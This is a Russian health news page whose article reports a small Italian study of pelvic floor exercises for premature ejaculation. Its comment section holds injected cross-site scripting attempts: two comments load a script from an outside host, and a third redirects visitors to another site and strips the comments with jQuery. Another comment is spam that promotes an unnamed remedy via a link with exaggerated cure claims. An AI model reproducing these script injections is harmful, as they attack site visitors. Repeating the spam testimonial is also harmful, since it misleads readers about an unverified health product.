Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Муж не может долго занима...  >>  Муж не может долго заниматься сексом? Всего одна вещь решит вашу проблему!
 
Обратная связь
 

Муж не может долго заниматься сексом? Всего одна вещь решит вашу проблему!

Размер шрифта
14 ноября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Оказывается, физические упражнения могут помочь решить даже проблемы в сексуальной жизни: результаты исследования, представленного на Европейском Конгрессе по урологии в Стокгольме, говорят о том, что тренировка мышц тазового дна эффективна при лечении преждевременного семяизвержения у мужчин.

Преждевременная эякуляция возникает у небольшого процента мужчин в определенные периоды их жизни. Существует множество методик терапии этого нарушения, некоторые из них довольно эффективны, однако часть пациентов остаются устойчивыми к лечению. Восприятие этой проблемы самими пациентами часто субъективно, а международное общество сексологов определяет ее как «эякуляцию в течение минуты».

Исследование возглавил доктор Антонио Пасторе из Университета Рима. В нем приняли участие 40 мужчин в возрасте от 19 до 46 лет, у которых наблюдалась преждевременная эякуляция. Их обучили упражнениям для тренировки мышц тазового дна, которые они выполняли в течение 12 недель. Также в течение этого времени участники измеряли время, которое требовалось им для достижения оргазма. К тому времени все эти мужчины уже испробовали множество методов лечения, однако значительных улучшений они не добились. В начале эксперимента время до эякуляции составляло в среднем 31,7 секунды, но через 12 недель оно значительно увеличилось и составило уже 146,2 секунды. Улучшение не наблюдалось только у пяти участников. 13 мужчин продолжили участие в эксперименте в течение 6 месяцев, по прошествии которых всем им удалось достигнуть желаемых результатов.

Упражнения для тазового дня часто используются у пациентов с недержанием мочи, особенно после операций в связи с раком простаты. Настоящая работа впервые исследует применение этого метода лечения у мужчин, у которых нарушения сексуальной функции наблюдались в течение всей жизни.

«Это небольшое исследование, так что результаты должны быть подтверждены на большем количестве пациентов. Однако наши данные очень обнадеживают», – рассказывает доктор Пасторе. «Эти упражнения довольно просты в исполнении и не имеют побочных эффектов. Мужчины, участвовавшие в нашем эксперименте, пробовали множество средств – различные кремы, препараты, психотерапию, однако они не давали желаемого эффекта. Мы же смогли добиться улучшения у 33 пациентов из 40 за 12 недель. Тот факт, что мужчины смогли улучшить свою сексуальную жизнь собственными силами, значительно повысил их уверенность в себе. Хотя техника упражнений еще должна быть стандартизована, уже сейчас они могут быть применены при лечении преждевременной эякуляции».

Профессор Карло Бетточчи, член Европейской Ассоциации урологов, отметил: «Это очень интересная работа. Преждевременная эякуляция – серьезная проблема для многих мужчин, и нам очень важно найти эффективные способы ее лечения. Одним из достоинств данной методики является и то, что пациенты могут помочь себе сами, и это благотворно влияет на их психологическое состояние».

Так что вполне возможно, что ученым наконец удалось наконец найти довольно простой и при этом очень эффективный способ лечения этой деликатной медицинской проблемы.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:29

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:25

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

4 - Гость

26 апреля 2016 в 15:37

Цитировать   |   Пожаловаться

Я всегда быстро кончал, 5-7 минут и все, надеялся, что с возрастом пройдет, но не прошло.

Ходил по больницам, выписывали мне бесполезные лекарства, пробовал народную медицину, всякие таблетки, перечитал много литературы, ничего не помогло. Каждый раз было жесть как стыдно перед девушками, которые быстро прекращали со мной встречаться, конечно, кому нафиг нужен парень неспособный удовлетворить

На одном форуме парень, который избавился от аналогичной проблемы рассказал мне про вот это средство - http://pravblogs.ru

Смотрю что-то новое, думаю надо попробовать, хуже уже не будет. Купил короче и решил затестировать на себе без девушки, чтоб опять не опозориться. Не угорайте, ничего смешного. Принял это средство, подождал несколько минут и  включил фильм для взрослых, ну дальше сами понимаете..

Я реально обалдел, вместо обычных 4-6 минут меня хватило почти на 35! И такое в первый день приема, а не как обычно курсового применения. Прошло около месяца 1.5 я уже прекратил принимать это средство, все стало норм и без него, можно сказать вылечился, меньше 35-45 минут теперь не бывает
Обязательно гляньте, удачи всем, мужики!

5 - Гость

26 августа 2016 в 01:34

Цитировать   |   Пожаловаться

Бред

Статьи

       
Хотите бросить курить или заставить мужа бросить? Больше секса!   Куда отправить мужа, если он мешает вам спать?   Коротышки лучше высоких мужчин! В чем же?   Секс при простатите: особенности и последствия  
09 июля 2013Майкл Дуглас заболел раком гортани из-за орального секса! Как дальше жить? 23 июля 2013Из лысых крыс сделают лекарство от рака
 
01 июля 2013Сладкая парочка против рака простаты! Соя + помидор! 15 мая 2013Ура! Ходить по лестнице так же эффективно для похудения, как ходить в спортивный зал!
 

Слайдшоу

1
Чем полезен секс?
Почему вы не хотите заниматься сексом?
9 причин занятся сексом прямо сейчас

Тесты

1
Здорова ли ваша предстательная железа
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.